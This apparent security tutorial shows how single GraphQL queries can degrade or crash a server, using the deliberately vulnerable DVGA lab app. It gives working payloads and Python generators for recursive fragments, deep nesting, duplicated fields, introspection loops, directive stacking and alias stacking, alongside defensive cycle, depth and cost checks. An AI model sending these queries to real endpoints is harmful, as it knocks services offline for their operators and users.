This article focuses on causing service degradation and denial of service (DoS) using quirks that are part of the GraphQL specification by design.

For these exercises we will use the Damn Vulnerable GraphQL Application (DVGA). If you wish to follow along, we recommend running it in Docker; otherwise you risk triggering a DoS against yourself!

DoS on APIs? Surely rate limiting will solve this?

Unfortunately, rate limiting does nothing to prevent these types of attacks. Typical DoS/DDoS attacks direct a large volume of traffic at an endpoint with the intent of taking it offline. These attacks are different: they are logic-based, and if crafted appropriately they need only a single request to take the service offline. A single request looks like normal traffic to a rate-limiting appliance, so rate limiting will not help here.

Infinite Loops: The Hidden Hazard of GraphQL Fragments

Fragments. A fantastic showcase of what can go wrong when well-meaning functionality is used in an unexpected manner. Essentially, fragments save you from typing out the same set of field names over and over in long queries. Think of them like a bash alias for commands you run frequently. For more detail, see the Apollo documentation on fragments.

They are defined like so:

```graphql
fragment NAMEYOUMADEUP on Object_type_name_that_exists {
  field1
  field2
}
```



Here is a real example from the application used in this article:

```graphql
fragment CommonFields on PasteObject {
  title
  content
}
```

When the fragment is used, the title and content fields are still retrieved, even though only the fragment name appears in the query.

Note that the three periods before the fragment name are not filler. This is the spread operator (in GraphQL terms, a fragment spread), and it is required when using a fragment in a query.



You may have an idea of what is coming next. What if we were to define two fragments and have them call each other, like so?

```graphql
query {
  pastes {
    ...CommonFields
    ...TestFields
  }
}

fragment CommonFields on PasteObject {
  ...TestFields
}

fragment TestFields on PasteObject {
  ...CommonFields
}
```

If you run this yourself, you will be very glad you ran it in Docker. The circular, unending and unresolvable nature of the query takes the instance down. This is a true denial of service, using a single query and a feature that is built into the GraphQL specification. The only information you need to perform this attack is the name of a single object type; here we simply reuse PasteObject for both fragments.

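Strictly speaking, the GraphQL specification does anticipate this. One of its validation rules states that fragment spreads must not form cycles, so a compliant server should reject this query before executing it. The danger lies in servers that expand fragments without applying that rule, and in middleware that inspects queries before validation runs. The API developer may not have done anything wrong in their own code for this to occur. This is why mitigation tends to fall to the GraphQL library itself or to third party tooling layered in front of it.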
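The GraphQL specification's validation rules include one stating that fragment spreads must not form cycles. Enforcing that rule amounts to cycle detection on the graph of fragment spreads. Below is a minimal Python sketch of that check; it is not taken from any particular GraphQL library. It assumes the fragment definitions have already been parsed into a dictionary that maps each fragment name to the fragment names it spreads. `find_fragment_cycle` is a hypothetical helper, and the parsing step is not shown.

```python
from typing import Dict, List, Optional


def find_fragment_cycle(spreads: Dict[str, List[str]]) -> Optional[List[str]]:
    """Return one cycle of fragment names (first name repeated at the end), or None.

    `spreads` maps each defined fragment to the fragment names it spreads.
    Building this map from the query text is assumed to happen elsewhere.
    """
    UNVISITED, ON_PATH, DONE = 0, 1, 2
    state = {name: UNVISITED for name in spreads}
    path: List[str] = []

    def visit(name: str) -> Optional[List[str]]:
        state[name] = ON_PATH
        path.append(name)
        for child in spreads[name]:
            if child not in spreads:
                continue  # undefined fragment: another validation rule's job
            if state[child] == ON_PATH:
                # child is already on the current path, so we have looped back
                return path[path.index(child):] + [child]
            if state[child] == UNVISITED:
                cycle = visit(child)
                if cycle is not None:
                    return cycle
        path.pop()
        state[name] = DONE
        return None

    for name in spreads:
        if state[name] == UNVISITED:
            cycle = visit(name)
            if cycle is not None:
                return cycle
    return None


# The two fragments from the query above spread each other.
circular = {"CommonFields": ["TestFields"], "TestFields": ["CommonFields"]}
print(find_fragment_cycle(circular))  # ['CommonFields', 'TestFields', 'CommonFields']
```

The search is recursive. A pathologically long, but acyclic, chain of fragments would therefore need an iterative version to stay under Python's recursion limit.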

GraphQL Recursive relationships



Using tools such as GraphQL Voyager, we can visualise the relationships between objects in a schema.

Voyager makes it easy to identify recursive relationships, which can indicate a flaw in the application's business logic. Unlike circular fragments, these are not specification issues; they are flaws introduced by the developers.

We can see that the paste and pastes fields on OwnerObject both reference PasteObject, while the owner field on PasteObject references OwnerObject.



Using this information, we can make a circular request like so:

```graphql
query {
  pastes {
    owner { name }
  }
}
```

This returns in a normal amount of time, as we aren't really doing anything wrong yet. However, both types reference one another, so we can keep nesting the query, bouncing back and forth between pastes and owner, and it remains a perfectly valid query. With twenty of these stacked inside one another, the request now takes over a second.

Doubling that to 40 stacked levels, it takes over 5 minutes to get a response. In fact, it took so long that I killed the request, because the entire instance had become unusable. Pure service degradation, from a single query!
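Typing out forty levels of nesting by hand is tedious. The following minimal Python sketch generates the nested query. It assumes the DVGA field names used above (`pastes`, `owner`, `name`). The hypothetical `brace_depth` helper is a crude stand-in for a depth limit: it only counts `{` nesting (and ignores string literals). Real depth-limiting tools walk the parsed query and must also expand fragments.

```python
def nested_paste_query(depth: int) -> str:
    """Bounce between PasteObject.owner and OwnerObject.pastes `depth` times."""
    if depth < 1:
        raise ValueError("depth must be at least 1")
    opening = "pastes { owner { " * depth
    closing = "} } " * depth
    # Innermost selection asks for the owner's name, as in the query above.
    return "query { " + opening + "name " + closing + "}"


def brace_depth(query: str) -> int:
    """Deepest `{` nesting; a crude stand-in for AST-based depth analysis."""
    depth = deepest = 0
    for ch in query:
        if ch == "{":
            depth += 1
            deepest = max(deepest, depth)
        elif ch == "}":
            depth -= 1
    return deepest


print(nested_paste_query(2))
# query { pastes { owner { pastes { owner { name } } } } }
for levels in (1, 20, 40):
    print(levels, brace_depth(nested_paste_query(levels)))
# 1 3
# 20 41
# 40 81
```

A server enforcing even a modest depth limit, say rejecting anything deeper than 10, would refuse the 20- and 40-level queries before any resolver ran.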

Field Duplication

This is similar to abusing recursive relationships. Instead of relying on bidirectional fields, which may not always be present, we simply repeat the same field in a valid query many times. And by many, I mean an extreme number of times.





In this screenshot, a normal query for all pastes with their title and content returns in 64ms.



But if I duplicate the content field one thousand times, it takes almost a full second.

And if I were to add it in 5,000 times, it takes over 13 seconds.
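The duplicated query is easy to generate programmatically. Here is a minimal Python sketch that assumes the DVGA `pastes` query with its `title` and `content` fields; `duplicated_field_query` is a hypothetical helper. The copies share one response name, so GraphQL execution merges them into a single field in the response. Much of the extra time is therefore probably spent parsing and validating the query rather than resolving `content` thousands of times. One likely cost is the specification's check that overlapping fields can be merged.

```python
def duplicated_field_query(field: str, copies: int) -> str:
    """Build a pastes query that selects `field` `copies` times alongside title."""
    repeated = " ".join([field] * copies)
    return "query { pastes { title " + repeated + " } }"


print(duplicated_field_query("content", 3))
# query { pastes { title content content content } }

# The 1,000 and 5,000 copy variants from the timings above:
small = duplicated_field_query("content", 1000)
large = duplicated_field_query("content", 5000)
```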

Unless the developer has implemented query cost analysis, there is no escaping this technique in GraphQL. Nothing about it breaks the GraphQL specification, and the server sees it as a perfectly valid query. Rate limiting and traditional security controls cannot prevent this type of attack without a mechanism that estimates how costly a request will be before processing it.
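Query cost analysis means estimating how expensive a query is before executing it and rejecting anything over a budget. The minimal Python sketch below uses the crudest possible estimate, one point per name token, and a hypothetical budget of 500. Real cost analysis works on the parsed query and weights fields by type and expected list size. Even this naive count, though, flags thousands of duplicated fields, and thousands of stacked directives too, since directive names are also name tokens.

```python
import re

# One GraphQL name token: field names, aliases, argument and directive names.
NAME = re.compile(r"[_A-Za-z][_0-9A-Za-z]*")
# Simple "..." string literals; block strings are not handled in this sketch.
STRING = re.compile(r'"(?:[^"\\]|\\.)*"')


def estimated_cost(query: str) -> int:
    """Crude cost: one point per name token, ignoring string literal contents."""
    return len(NAME.findall(STRING.sub('""', query)))


def enforce_budget(query: str, budget: int = 500) -> int:
    """Reject a query before execution if its estimated cost exceeds `budget`."""
    cost = estimated_cost(query)
    if cost > budget:
        raise ValueError(f"query cost {cost} exceeds budget of {budget}")
    return cost


print(enforce_budget("query { pastes { title content } }"))  # 4
try:
    enforce_budget("query { pastes { " + "content " * 5000 + "} }")
except ValueError as err:
    print(err)  # query cost 5002 exceeds budget of 500
```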

As a real-world example, in 2019 GitLab discovered they themselves were vulnerable to this type of attack. https://gitlab.com/gitlab-org/gitlab/-/issues/30096

Introspection

Introspection is also vulnerable to circular queries, right out of the gate, anywhere it is enabled. For penetration testers, it is also worth noting that enabled introspection is a finding in and of itself.

Inside __schema we can request types. Each type exposes its fields, each field exposes its type, that type exposes its fields again, and so on and so forth. Here is a small proof of concept:

```graphql
query {
  __schema {
    types {
      fields {
        type {
          fields {
            type {
              fields {
                name
              }
            }
          }
        }
      }
    }
  }
}
```
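The proof of concept above can be generated to any depth. Here is a minimal Python sketch in which `introspection_query` is a hypothetical helper and `levels` counts the `fields { type { ... } }` pairs. With `levels=2`, it reproduces the query above exactly.

```python
def introspection_query(levels: int) -> str:
    """Nest `fields { type { ... } }` under __schema.types `levels` times."""
    if levels < 0:
        raise ValueError("levels must be non-negative")
    opening = "fields { type { " * levels
    closing = "} } " * levels
    # The innermost selection matches the proof of concept: fields { name }
    return ("query { __schema { types { " + opening + "fields { name } "
            + closing + "} } }")


print(introspection_query(2))
# query { __schema { types { fields { type { fields { type { fields { name } } } } } } } }
```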



To visualise what is happening here, let's send a normal query that is not trying to cause harm.

This returns in a normal amount of time, as it is a normal query.



What if I were to double the number of introspections?



We can see that it takes three times as long to do twice as much work. Something is certainly a bit wobbly here, and we can absolutely abuse this some more.

With approximately twenty introspections stacked in a single request, it now takes almost three seconds. We have absolutely proven that service degradation can be caused with a single query.

This type of attack is GraphQL specification compliant. We are doing nothing here except (ab)using introspection in the way it was designed. This is a very good reason for developers to disable introspection on all public GraphQL endpoints, because leaving it turned on allows this to occur.

Directive Stacking

The GraphQL specification places no limit on the number of directives that can be applied to a field. The server must also process every directive it is given to determine whether it is real or fictitious. This means it does not matter what we send: it will still be processed, and we are still submitting syntactically valid queries that are unlikely to trigger a WAF.





In the screenshots, I am sending approximately 100 fake directives to the endpoint, which takes almost 5 seconds to respond.

Adding 40,000 fake directives now makes responses return in over 50 seconds.
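A query like the one in the screenshots can be generated as follows. This is a minimal Python sketch. The directive name `aa` and the choice of `pastes { title }` as the target field are illustrative assumptions; any undefined directive name should behave the same way. `directive_stack_query` is a hypothetical helper.

```python
def directive_stack_query(count: int, directive: str = "aa") -> str:
    """Attach `count` copies of a made-up directive to one field."""
    directives = " ".join(f"@{directive}" for _ in range(count))
    return "query { pastes { title " + directives + " } }"


print(directive_stack_query(3))  # query { pastes { title @aa @aa @aa } }

# The 40,000-directive variant from the timing above:
big = directive_stack_query(40000)
```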

The server responds with a 400 because the directive does not exist. Unlike a 400 from a REST API, however, this does not mean the request was malformed. The query is syntactically valid GraphQL, and the server still has to parse and check every directive before it can reject it. The fact that we can measurably adjust the response time shows this is a valid denial of service vector, despite the 400 responses.

Stacking queries with aliases



This is the last example, and it is a little funny. Before we get into it, it is important to know that the systemUpdate function on DVGA is designed to run for a random amount of time. Your response times may not line up with the screenshots at all, but if you do the experiments you will find that this vector does in fact work.



A series of stacked system updates takes 50 seconds in this screenshot. While this looks concerning, it is in fact in line with what that DVGA function does when run a single time.

A single query taking around 30 seconds and a stacked query taking 50 seconds might suggest that it is processing multiple times. However, the difference is still within the variance that the function can produce.



If we instead stack the queries using aliases, as shown in the screenshot, the picture changes.

The request now takes almost 4 minutes to process. This is not expected behaviour for the function. It indicates that we have caused service degradation by triggering the function multiple times within a single query.
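Aliases likely make the difference because of how GraphQL execution collects fields. Selections with the same response name are merged and resolved once. Each distinct alias, by contrast, is its own response key, so its resolver runs separately. Here is a minimal Python sketch for generating such a query. It assumes `systemUpdate` is a top-level query field that takes no arguments, as the DVGA examples suggest. The alias names `a0`, `a1` and so on are arbitrary, and `aliased_query` is a hypothetical helper.

```python
def aliased_query(field: str, copies: int) -> str:
    """Select `field` `copies` times, each under its own alias (a0, a1, ...)."""
    selections = " ".join(f"a{i}: {field}" for i in range(copies))
    return "query { " + selections + " }"


print(aliased_query("systemUpdate", 3))
# query { a0: systemUpdate a1: systemUpdate a2: systemUpdate }
```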

In summary

Hopefully this has been an illuminating article and gives some insight into the varied ways denial of service and service degradation can be caused without utilising high volumes of traffic against a GraphQL endpoint.